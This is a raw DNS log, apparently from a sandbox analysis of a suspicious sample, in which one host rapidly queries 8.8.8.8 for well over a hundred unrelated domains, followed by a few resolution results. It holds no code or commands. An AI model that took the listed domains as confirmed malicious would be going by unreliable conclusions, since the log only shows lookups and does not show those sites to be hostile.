                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.766364098 CEST192.168.2.48.8.8.80x903bStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.953192949 CEST192.168.2.48.8.8.80xe66bStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.954828978 CEST192.168.2.48.8.8.80x6df6Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.126574993 CEST192.168.2.48.8.8.80x1b35Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.182166100 CEST192.168.2.48.8.8.80x7386Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.183523893 CEST192.168.2.48.8.8.80x843Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.361291885 CEST192.168.2.48.8.8.80xa75cStandard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.391088009 CEST192.168.2.48.8.8.80xc0b6Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.596532106 CEST192.168.2.48.8.8.80xb183Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.600528955 CEST192.168.2.48.8.8.80x697cStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.635504007 CEST192.168.2.48.8.8.80x91b3Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.665736914 CEST192.168.2.48.8.8.80x4553Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.690762043 CEST192.168.2.48.8.8.80x3eedStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.797410965 CEST192.168.2.48.8.8.80x90c4Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.876400948 CEST192.168.2.48.8.8.80xcb0fStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.954448938 CEST192.168.2.48.8.8.80x76f4Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:09.968992949 CEST192.168.2.48.8.8.80x381fStandard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.170749903 CEST192.168.2.48.8.8.80xdc39Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.390418053 CEST192.168.2.48.8.8.80x5c5cStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.469149113 CEST192.168.2.48.8.8.80x3340Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.472951889 CEST192.168.2.48.8.8.80xcbbaStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.688996077 CEST192.168.2.48.8.8.80x843Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.766345024 CEST192.168.2.48.8.8.80x3e58Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.801071882 CEST192.168.2.48.8.8.80xe10eStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.984539032 CEST192.168.2.48.8.8.80x7ef6Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.991488934 CEST192.168.2.48.8.8.80xf008Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:10.993571043 CEST192.168.2.48.8.8.80xc7faStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:11.252398014 CEST192.168.2.48.8.8.80x371Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:11.406860113 CEST192.168.2.48.8.8.80xfb87Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.043315887 CEST192.168.2.48.8.8.80x3826Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.044879913 CEST192.168.2.48.8.8.80x30afStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.046868086 CEST192.168.2.48.8.8.80xe075Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.048652887 CEST192.168.2.48.8.8.80xe397Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.050478935 CEST192.168.2.48.8.8.80x8cd3Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.051981926 CEST192.168.2.48.8.8.80x47dfStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.053663015 CEST192.168.2.48.8.8.80xa06aStandard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.055557013 CEST192.168.2.48.8.8.80x80eStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.057077885 CEST192.168.2.48.8.8.80xbafStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.058832884 CEST192.168.2.48.8.8.80xe672Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.060688972 CEST192.168.2.48.8.8.80x33d8Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.062544107 CEST192.168.2.48.8.8.80x8d24Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.220069885 CEST192.168.2.48.8.8.80x988aStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.252475977 CEST192.168.2.48.8.8.80x6462Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.732811928 CEST192.168.2.48.8.8.80x42c9Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.955868959 CEST192.168.2.48.8.8.80x371Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.958112001 CEST192.168.2.48.8.8.80x1d34Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.960835934 CEST192.168.2.48.8.8.80x410bStandard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.963896990 CEST192.168.2.48.8.8.80x3516Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:12.970004082 CEST192.168.2.48.8.8.80x2aa1Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:13.114712000 CEST192.168.2.48.8.8.80x3fStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:13.761349916 CEST192.168.2.48.8.8.80x1075Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:13.860807896 CEST192.168.2.48.8.8.80x3076Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.060431004 CEST192.168.2.48.8.8.80x42f0Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.061909914 CEST192.168.2.48.8.8.80x6e3fStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.062521935 CEST192.168.2.48.8.8.80x7044Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.092828035 CEST192.168.2.48.8.8.80x6bb5Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.110802889 CEST192.168.2.48.8.8.80x29caStandard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.152849913 CEST192.168.2.48.8.8.80x286Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.388154984 CEST192.168.2.48.8.8.80x6f73Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.523144007 CEST192.168.2.48.8.8.80xdf26Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.524547100 CEST192.168.2.48.8.8.80x988aStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.569535017 CEST192.168.2.48.8.8.80x3898Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.570024967 CEST192.168.2.48.8.8.80x46b0Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.655355930 CEST192.168.2.4198.32.64.120x4eStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.860038996 CEST192.168.2.48.8.8.80x3a6fStandard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.976452112 CEST192.168.2.48.8.8.80xa8cStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:14.978605032 CEST192.168.2.48.8.8.80x9e91Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.308808088 CEST192.168.2.48.8.8.80x2290Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.311826944 CEST192.168.2.48.8.8.80xe682Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.613255024 CEST192.168.2.48.8.8.80x5fafStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.619546890 CEST192.168.2.48.8.8.80xf0b6Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.681279898 CEST192.168.2.48.8.8.80xe3a4Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.705737114 CEST192.168.2.48.8.8.80x6964Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.854437113 CEST192.168.2.48.8.8.80x9cb8Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.031671047 CEST192.168.2.48.8.8.80x360dStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.228981018 CEST192.168.2.48.8.8.80x4cabStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.360218048 CEST192.168.2.48.8.8.80x6d2fStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.368043900 CEST192.168.2.48.8.8.80xf82aStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.583566904 CEST192.168.2.48.8.8.80xf099Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.621890068 CEST192.168.2.48.8.8.80xc4e2Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.628226042 CEST192.168.2.48.8.8.80xe2dbStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.662921906 CEST192.168.2.48.8.8.80xfc59Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.667247057 CEST192.168.2.48.8.8.80x2329Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.671406031 CEST192.168.2.48.8.8.80xde0cStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.682518005 CEST192.168.2.48.8.8.80x46b3Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.689471960 CEST192.168.2.48.8.8.80x1594Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.695194960 CEST192.168.2.48.8.8.80x4dfcStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.703377962 CEST192.168.2.48.8.8.80x4928Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.714644909 CEST192.168.2.48.8.8.80xed4cStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.715049028 CEST192.168.2.48.8.8.80xed37Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.718092918 CEST192.168.2.48.8.8.80x7363Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.726747990 CEST192.168.2.48.8.8.80x2802Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.743374109 CEST192.168.2.48.8.8.80x10ccStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.747227907 CEST192.168.2.48.8.8.80xd1e6Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.754766941 CEST192.168.2.48.8.8.80x93faStandard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.764529943 CEST192.168.2.48.8.8.80x5a81Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.767059088 CEST192.168.2.48.8.8.80x9817Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.770106077 CEST192.168.2.48.8.8.80x3582Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.774405956 CEST192.168.2.48.8.8.80xab0cStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.787190914 CEST192.168.2.48.8.8.80x237dStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.798707962 CEST192.168.2.48.8.8.80xe2b7Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.801184893 CEST192.168.2.48.8.8.80xe631Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.828470945 CEST192.168.2.48.8.8.80xa2a8Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.871853113 CEST192.168.2.48.8.8.80x668Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.884077072 CEST192.168.2.48.8.8.80x8856Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.035403013 CEST192.168.2.48.8.8.80xaa2eStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.074014902 CEST192.168.2.48.8.8.80x8948Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.076745987 CEST192.168.2.48.8.8.80x76dcStandard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.098591089 CEST192.168.2.48.8.8.80x6112Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.130466938 CEST192.168.2.48.8.8.80xe4bfStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.168793917 CEST192.168.2.48.8.8.80xaf82Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.223402023 CEST192.168.2.48.8.8.80xccfeStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.274452925 CEST192.168.2.48.8.8.80xf967Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.310058117 CEST192.168.2.48.8.8.80x1da6Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.366708994 CEST192.168.2.48.8.8.80x2e78Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.403369904 CEST192.168.2.48.8.8.80x321eStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.404902935 CEST192.168.2.48.8.8.80x759dStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.507764101 CEST192.168.2.48.8.8.80x9afbStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.513609886 CEST192.168.2.48.8.8.80x218fStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.539921045 CEST192.168.2.48.8.8.80x4ecfStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.565222025 CEST192.168.2.48.8.8.80x827cStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.622514963 CEST192.168.2.48.8.8.80x78a1Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.705193996 CEST192.168.2.48.8.8.80x1a1aStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.705348015 CEST192.168.2.48.8.8.80x1594Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.788429022 CEST192.168.2.48.8.8.80xf15fStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.840810061 CEST192.168.2.48.8.8.80xa2a3Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.884712934 CEST192.168.2.48.8.8.80xfc28Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.896245003 CEST192.168.2.48.8.8.80x61d2Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.908005953 CEST192.168.2.48.8.8.80x8cffStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.917283058 CEST192.168.2.48.8.8.80x294dStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.010620117 CEST192.168.2.48.8.8.80x4e58Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.019980907 CEST192.168.2.48.8.8.80xc93cStandard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.032121897 CEST192.168.2.48.8.8.80x93ebStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.106180906 CEST192.168.2.48.8.8.80x2791Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.118845940 CEST192.168.2.48.8.8.80x7e1dStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.171818018 CEST192.168.2.48.8.8.80xaf82Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.222975969 CEST192.168.2.48.8.8.80xf862Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.280342102 CEST192.168.2.48.8.8.80x25bStandard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.323312044 CEST192.168.2.48.8.8.80xadcStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.585836887 CEST192.168.2.48.8.8.80xb3a3Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.586499929 CEST192.168.2.48.8.8.80x4604Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.597470045 CEST192.168.2.48.8.8.80xb7dcStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.722249985 CEST192.168.2.48.8.8.80x1594Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.725810051 CEST192.168.2.48.8.8.80x7dbbStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.879491091 CEST192.168.2.48.8.8.80xcf7bStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.941416025 CEST192.168.2.48.8.8.80xea81Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.964468002 CEST192.168.2.48.8.8.80x3cdeStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.967348099 CEST192.168.2.48.8.8.80xd20dStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.213641882 CEST192.168.2.48.8.8.80x6658Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.259022951 CEST192.168.2.48.8.8.80xda03Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.281668901 CEST192.168.2.48.8.8.80x8c6aStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.318648100 CEST192.168.2.48.8.8.80x946Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.337236881 CEST192.168.2.48.8.8.80x25d6Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.353004932 CEST192.168.2.48.8.8.80x4146Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.375427008 CEST192.168.2.48.8.8.80x4e0cStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.382234097 CEST192.168.2.48.8.8.80x853bStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.449498892 CEST192.168.2.48.8.8.80xd42fStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.593728065 CEST192.168.2.48.8.8.80x4604Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.630466938 CEST192.168.2.48.8.8.80x6cceStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.735771894 CEST192.168.2.48.8.8.80x44bfStandard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.751630068 CEST192.168.2.48.8.8.80x6a3aStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.780354977 CEST192.168.2.48.8.8.80xf665Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.790982962 CEST192.168.2.48.8.8.80x4ac6Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.836249113 CEST192.168.2.48.8.8.80x3a91Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.873070002 CEST192.168.2.48.8.8.80xbbefStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.904964924 CEST192.168.2.48.8.8.80x2243Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.920842886 CEST192.168.2.48.8.8.80x8a1dStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.705241919 CEST8.8.8.8192.168.2.40xc799No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.705241919 CEST8.8.8.8192.168.2.40xc799No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.707779884 CEST8.8.8.8192.168.2.40x50b8No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.707779884 CEST8.8.8.8192.168.2.40x50b8No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.708677053 CEST8.8.8.8192.168.2.40x1d5fNo error (0)www.ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.708677053 CEST8.8.8.8192.168.2.40x1d5fNo error (0)www.ftchat.com188.114.96.7A (IP address)IN (0x0001)false
